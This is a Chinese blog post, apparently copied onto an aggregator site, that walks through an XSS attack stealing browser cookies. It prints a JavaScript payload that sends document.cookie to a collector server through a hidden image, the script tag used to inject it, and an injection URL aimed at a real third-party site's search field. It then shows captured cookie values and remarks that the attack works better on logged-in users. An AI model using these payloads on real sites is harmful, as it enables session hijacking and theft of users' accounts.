XSS Payload 远程脚本攻击
来源:互联网 发布:linux 清空屏幕 编辑:程序博客网 时间:2024/06/05 15:24
今天看了一本书,关于web安全方面的,所以也动手测试了以下。
下面就只讲一下 XSS Payload远程脚本攻击吧, 执行远程脚本,提取cookie
先来个简单的吧
<script>alert(1);</script>
首先说明像chrome、ie新版等浏览器已经有css防御
比如以下是chrome浏览器打印出来的,chrome浏览器的安全机制是比较强大的
后来试用了火狐浏览器,没想到确实可以。
那么下边我们来做个提取cookies信息的js,另外写一个servlet进行打印“存储”
js文件如下
var img = document.createElement('img');img.width = 0;img.height = 0;img.src = 'http://127.0.0.1:8080/Test/hello?cookie='+encodeURIComponent(document.cookie);
servlet就不写了,简单的get请求,获取参数进行打印
然后启动这个服务。
把 这段代码注入到页面中
<script src="http://127.0.0.1:8080/Test/static/p.js"></script>
http://codecloud.net/?s=<script src='http://127.0.0.1:8080/Test/static/p.js'></script>
OK,后台打印cookie信息成功。
Hm_lvt_f9c50534f93ca6e9404bc6bcb294115c=1460455423; Hm_lpvt_f9c50534f93ca6e9404bc6bcb294115c=1460458080; BDTUJIAID=0f260b8f0f6bd80e5a66403f2918b693; _ga=GA1.2.1298042985.1460455423; _gat=1
毫无压力所有cookie到手,如果当时用户登录中效果更佳 :)
0 0
- XSS Payload 远程脚本攻击
- XSS 攻击常用脚本
- XSS 跨站式脚本攻击
- XSS攻击常用脚本
- XSS攻击常用脚本
- 跨站脚本攻击(XSS)
- XSS 跨站脚本攻击
- 跨站脚本攻击(XSS)
- xss 跨站脚本攻击
- 跨站脚本攻击XSS
- 跨站脚本攻击XSS
- XSS跨站脚本攻击
- XSS脚本攻击及防御
- 跨站脚本攻击XSS
- XSS(跨站脚本攻击)
- 跨站脚本攻击XSS
- 跨站脚本攻击-XSS
- XSS跨脚本攻击原理
- TCP/IP(八)DNS域名系统
- C++经典开源库
- 错误:'xxx/xxx.h' file not found
- plsqldev中查看表结构
- C# IndexOf、LastIndexOf、IndexOfAny,LastIndexOfAny
- XSS Payload 远程脚本攻击
- 第一篇博客
- 【seq】数值序列
- java RMI入门指南
- 数据结构之链表
- div的高度自适用图片的高度
- servlet线程安全
- 【sftp】
- 对于初学iOS开发者有用之在UITableView的导航栏中加入Item的方法